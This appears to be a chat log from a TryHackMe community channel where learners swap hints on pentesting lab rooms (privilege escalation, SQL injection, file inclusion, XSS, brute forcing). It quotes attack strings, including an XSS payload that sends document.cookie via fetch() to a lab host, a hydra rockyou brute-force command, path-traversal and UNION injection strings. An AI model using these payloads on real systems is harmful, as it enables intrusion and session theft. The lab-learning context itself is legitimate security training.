Ok, I got it working but no root privileges. I'm gonna take a look further. Thanks so much for the help
Ah, that makes a lot of sense
Thanks again
Ok
Only Linux privesc and Windows privesc remaining and I get the certificate
I'm gonna do them tomorrow, I'm super tired
Are they difficult?
I'm working on the Linux PrivEsc right now. Some of the questions can be a bit tricky. At least for me.
You got this bro
I am on the LinPrivEsc Task 5 and when I SSH into the box, karen has no home directory. Is it supposed to be like that?
I can't find anywhere to write a file as karen to exploit
Thanks @steel nymph , I found it from the first clue
I've made sure my names don't have any spaces several times and still it doesn't work.. tried to clean everything and just leave the names, doesn't work; tried just removing extra lines between the names, doesn't work; tried doing everything all over again, doesn't work..... what a freaking mess xD
So it kind of goes without saying, but I think worth mentioning. In the SQLi course it doesn't say how we can verify that we have reached the full name of a database, table, column, or column entries. To verify that you have fully enumerated a name you can remove the wildcard. If the results still come back true then we know the full name. Something I added to my own notes. Thought it may help someone else as well!
Thank you @quiet crow
Gave +1 Rep to @quiet crow
Btw, I solved my issue. I was creating my valid_usernames.txt with a ">" from the previous question and removing spaces and stuff but the formatting still got messy. So I just created a new file, typed the names, ran the brute force command again and it solved the issue (thanks for the help anyway @unique steppe )
Pretty much @steel nymph, don't really know what went through my head to assume my old ways were just fine
I got stuck on #5 for command injection and just got it. Sometimes overthinking is the problem...
If anyone gets stuck at that one, look at the payload samples and keep it simple. Really simple lol
Dear THM staff.
Can we undo our progress to earn more tickets?
nope
I'm revising everything after completing.
They don't give tickets again obviously
sad we can't keep our pentester title forever
In Windows priv esc, how do I connect to the Windows instance?
I'm having the exact same issue - not seeing the credential. Did you get any feedback on this?
can anyone help?
!docs verify
Anyone completed protocols and server room 2??
What do you need help with?
Task 5 second question
I tried scp mark@ip:/home/mark/book.txt
I couldn't copy the file
Send a link to the room
Wdym
Send the link for the room you need help with
I'm too lazy to go out and find it myself
yes, I've verified my profile.
Authentication Bypass, Task 3 - not seeing credential. getting this.
I got the solution
port is the default one or something else? I do not remember exactly
I can give you the exact answer but it's better to give some hints
Yeah. It was due to my formatting of the source file from the previous task. Sorted that and it worked fine
I'm trying to understand why in SQLi (Web hacking) this is acceptable as an SQL statement: "admin123' UNION SELECT 1,2,3;-- ". Specifically I don't get the part after the UNION statement..... I mean the SELECT doesn't specify a table or anything. How is this acceptable?
Hey guys, in Linux privesc kernel exploitation, I got the CVE code, I started a SimpleHTTPServer using Python, but I can't use wget on karen
Like it says permission denied, cannot write to 'exploit.c'
When I try to download the exploit to the system
What should I do
Hello hello, hope you all are fantastic.
I am thinking of doing a game of Jeopardy with a few friends on the Junior Pentesting path.
Does anyone have a few questions that you think would fit nicely?
For the themes I'll do the ones in the path; like intro to web hacking, Burp, Net sec...
++
You are trying to write a file in the root directory; first go to user karen's home folder and then use wget there.
No worries, I solved it, I just went to /tmp and downloaded it there. Thanks @winter perch
Gave +1 Rep to @winter perch
Have you tried the Windows one?
Not yet no
Can anyone give me a nudge on how I can access the Windows target instance? The steps are not mentioned in the room.
Not sure which one you're talking about, but are there any RDP user credentials mentioned in any of the room tasks?
I am talking about the Win Priv esc nothing is mentioned there, I tried to find.
Sure you're typing the command out properly?
Look closer at Task 5 DLL Hijacking
Okay, thanks, these are not mentioned in Task 2. Let me try
Gave +1 Rep to @gleaming loom
Guys, I have a doubt:
I got 2 (1-month premium vouchers),
does it mean I can get 2 months premium??
@solid forge You only win if you get three of the same kind
If anyone has a doubt in lab 8 of SQL injection, he/she can ask me
It means I need one more premium voucher to win 1 month premium
why this "admin123' UNION SELECT 1,2,3;--" is valid?
You have to think on how the program on the server receives and processes this data
Probably it has something like: SELECT * FROM TABLE WHERE USER = [your data entered here]
So, it finally gets populated as: SELECT * FROM TABLE WHERE USER = admin123' UNION SELECT 1,2,3;
More or less, it's not exact, but just to have an idea
Yes, but I don't get how UNION SELECT 1,2,3; is valid.... Am I missing SQL syntax knowledge here?
When I write that in my cmd, it says that after SELECT I'm missing a table name...
https://portswigger.net/web-security/sql-injection/union-attacks <-- If you can invest some time...
I'm losing my mind with WinPrivEsc, it's dropping connection every few minutes
That statement is just trying to find that amount of columns in the table. In this case it's 3
Can someone please help me with File Inclusion room Task 8.
I am trying to send the request as a POST method and it's not showing any changes
I am sure I am missing something here?
HEY, I FINALLY GOT THIS ONE. THANK YOU SO MUCH
Gave +1 Rep to @steel nymph
Can someone help me with task 5 command injection I don't get it
Hey guys, I can't get the directory to download. I have to use the command:
scp pentester@10.10.199.15:/home/pentester/*
but I get nothing back
pentester has the password THM17577
I tried with WGET, it does not work.
Then I tried with: sshpass -p "password" but I don't get anywhere
but I can't get any further, can anyone give me a hint what I'm doing wrong?
This has been going on for 2 days now that I can't complete the "Authentication Bypass" task 4 for Logic Flow. Nothing wrong with my network.
Can this be done on my own VM w/ VPN?
Was just following instructions as it was saying to do both the curls and the AttackBox. I assumed it was set up in a way to make it work the way it was decided to.
Thanks
File Inclusion, TASK 8 - flag 2 :
Been trying for 1 hour with Burp but cannot get the flag. Just tried the same thing within the web dev tools (Firefox) and it worked within 3 seconds.. what the hell?
have you tried changing the cookies?
oh
You've already done it. my bad
Yes, changed it to the right value and still getting error with burp, except with the first value we need to change (#guest)
but firefox tool worked the first time
Don't understand
FINALLY!!!! Gracias!!!!
Except that I needed to have fuff and gobuster installed properly to understand the outcome.
or ffuf***
let me check that.
DANG... I think I'm losing it. LOL
Indeed it's installed and should have done the number one rule: Check check check!!!!
Um guys
How did you connect to the Windows privesc machine? Did you just use the AttackBox?
How can I do it from my Linux machine?
Ok but which tool did you use
Remmina it is
Thanks man
I am on LinPrivEscSUID and I cannot find any program that has a SUID escape on GTFOBins
File inclusion Task 8 Ahhhh, i need help.
Just not sure what to do with POST, I'm going for flag1. Using Burp. Change GET to POST in Repeater?
When does this event end, is it tonight at midnight or tomorrow at midnight? I was late to the party but getting there
I too have the same question
So i changed the request to POST ../../../../etc/flag1. nothing,
hi need a nudge regarding the linux privesc capstone challenge
all good.
Well even if it ends, the rooms will still be there
Is the cert still available after the week ?
Yeah man
Sweet
So don't worry
ok i have now stopped sweating
Hahaha
The only thing that changes is the tickets stop
Sweet, I am one ticket from a wifi pineapple tho
Better keep hacking then
I have never considered paying for software in my life but using Burp Suite all morning has me thinking about it
It's so fun to use
Ok I am stuck again on LinPrivEscSUID
who would believe I got 3euro voucher on my last machine lol
not only pen title and 1 day streak
So the third question is to get the flag, and from the information I assume that they want me to add a user to passwd. I am just stuck on how I accomplish that. Any hints?
I got how SUID can read files, but I don't know how I am supposed to write to passwd
Can someone help me? I have a syntax error and since the event expires tomorrow I would appreciate the answer; I am missing 1 ticket for a certificate X:X. It's the room Nmap Post Port Scans task 5, 2
oh, I overthought that one
sec i restart the machine
THIS IS THE TASK:
Shut down the target machine for the previous task and start the target machine for this task. On the AttackBox terminal, enter the command scp pentester@MACHINE_IP:/home/pentester/* . to download the Nmap reports in normal and grepable format from the target virtual machine.
Note that the username pentester has the password THM17577
have also already tried different designs
is the . important?
have already tried it with it
ah wait
Ah, I have the files already, only they were not found on my system earlier luul
xD
here was my request POST /challeneges/index.php?page-../../../../etc/flag1
Hi everyone, so I am stuck on Linux privesc task 11 (NFS)
I see there are 3 mountable shares on the target machine, out of which I can't "cd" into 2 of them, so the only genuine one is /tmp
So I mount the /tmp drive on the attacking machine, create the binary and make it executable, give it SUID permissions and root ownership. However, these files don't show up on the target machine's mountable share /tmp. Any idea why??
ne have done it wrong
I get the answer "usage: scp" and the commands
this what i get
Agreed, the syntax for the first one looks correct if the host is up.
Ah okay, I'll restart the VPN and the machine and try again^^
Make sure you update the IP address in your shell after doing that
Ahh no, I have Discord on Windows, the machine is Linux xD
ok :=)
In the Linux PrivEsc Capabilities task, the payload for vim is not giving me root access.
I swear I tried that... but now after you say something it works. Thanks @steel nymph
Gave +1 Rep to @steel nymph
I am on Lab#6 of the File Inclusion 6. It is asking me "what is the directory that has to be in the input field?". I have successfully previewed the passwd file by including the following URL: ....//....//....//....//etc/passwd The format of the answer is expecting fewer alphanumerics (11). I have tried different combinations such as /etc/passwd but I am not able to indicate the directory, which seems to be larger. I have also tried: /var/www/html Can anyone help? Thanks.
Is there anything else that has to be there to work?
Hi Allez. What do you mean? I include ....//....//....//....//etc/passwd and then press the "Include" button to display the passwd
I can't remember what the answer is, so just going by the way you asked the question, I assume there needs to be something (the directory) that is the starting point? I'll go and have a look at the exact question.
|| I didnt know where to find the remote file for getting me a shell. So, I just used LFI to find the hostname at /etc/hostname. ||
It's a simple spell but quite unbreakable
Has anyone been having issues with the XSS part where you have to run the <script>alert('THM');</script> inside the HTML and it doesn't accept it?
Hi, is there a possibility to win some prizes like 1 month premium and above? Because I have 2x for about 5 prizes but I can't win better prizes
Level 2 of task 7. I managed to do level 1 by just adding the script payload on the URL
I've found it. Take a good look at the page with the input form
Found it, Thanks. I thought it was a url not a directory.
Gave +1 Rep to @languid shuttle
I've definitely been bitten by assumptions like that far too often!
Oh, noice. Using php_reverse_shell.php as the exploit file?
yeah works for this chall specifically. Nice thought
@steel nymph I mean when I press enter on the inspector it will reload the page and the code is gone
yes
I guess that is the big error
What should I use?
Ah, on the first one
Got it
Thanks. I knew I was doing something wrong and guess that was using the inspector
Hey people, I'm trying to complete LFI #2 inside File Inclusion in the Junior Penetration Tester course and I accomplished the task; the one thing I can't seem to find is the name of the function in the second question, please help, it is something with 17 characters
-unmute @trail topaz As a heads up: 95,000 users do not want to know about your question, so pinging @ everyone is pretty inconsiderate. As you've already found out, it also insta-mutes you as a bot protection measure. If you have a question, please wait patiently for someone to answer (as indeed just happened)
Unmuted StarChild#8442
Thank you!
Gave +1 Rep to @steel nymph
Hi guys, I have a question about apache
Which room should I ask in?
general
I'm seeing an apache2 default page.
So not sure what to do next ..
Not a TryHackMe challenge, hence asking if there's an appropriate room to ask
A port 8080 that leads to a Tomcat page :/ Also, how do you tell if an SSH port is vulnerable to username enumeration?
ah sweet! Thanks!
Gave +1 Rep to @idle bison
on the linux PrivEsc Capstone, I have the contents of flag2. Any tips to find the location of flag1?
so the vector that I found was ||base64 SUID to let me read files||. I guess I need to look for another vector.
@steel nymph Got it thanks
Gave +1 Rep to @steel nymph
@brazen notch Hi! I found why my nc doesn't work. I looked at the devtools and then I saw
||5:53 Mixed Content: The page at 'https://10-10-207-185.p.thmlabs.com/customers/tickets/5' was loaded over HTTPS, but requested an insecure resource 'http://10.10.207.185/?cookie=c2Vzc2lvbj02Mzg0ZjQzZjgxY2Y3YzVmY2MyZTExY2YwYjk3YWFiZQ=='. This request has been blocked; the content must be served over HTTPS.||
I use both but don't receive anything
nope
you could also try to POST with curl e.g https://gist.github.com/subfuzion/08c5d85437d5d4f00e58
quick q on the NetSec Challenge -- my hydra is telling me 43032960 to do in 2656:22h, 16 active
I'm pretty sure I've messed something up. Usually, hydra goes a lot faster for me with 1 user and the rockyou list
i did lol
rockyou.txt and the box ip
hydra -l eddie -P /usr/share/wordlists/rockyou.txt 10.10.171.60 ftp
Which port?
Now it is always pending
but I see the cookie in devtools
like this
But I paste it in the base64 decoder page
the output is:
||session=6384f43f81cf7c5fcc2e11cf0b97aabe||
but it is not the answer
The lab asks me this question:
What is the value of the staff-session cookie?
Now what should I do?
nope
<script>fetch('https://10.10.207.185:9001?cookie=' + btoa(document.cookie) );</script> I use this script
I have the extra textarea tag
the stealthy scan completing the netsec challenge makes me think flag brute-forcing thoughts lol
mental note -- provide -vv output for it lol
I'm pretty sure I'm going to get it, but I'm going painfully slow
Oh, I'm only at 14%. My scan should be done in a few minutes
thanks for the hint
I'm kind of forgetful today
thanks
I always slap the return key to get that little update lol
any idea why my % sometimes increases when I'm not scanning?
is that the "IDS" being buggy?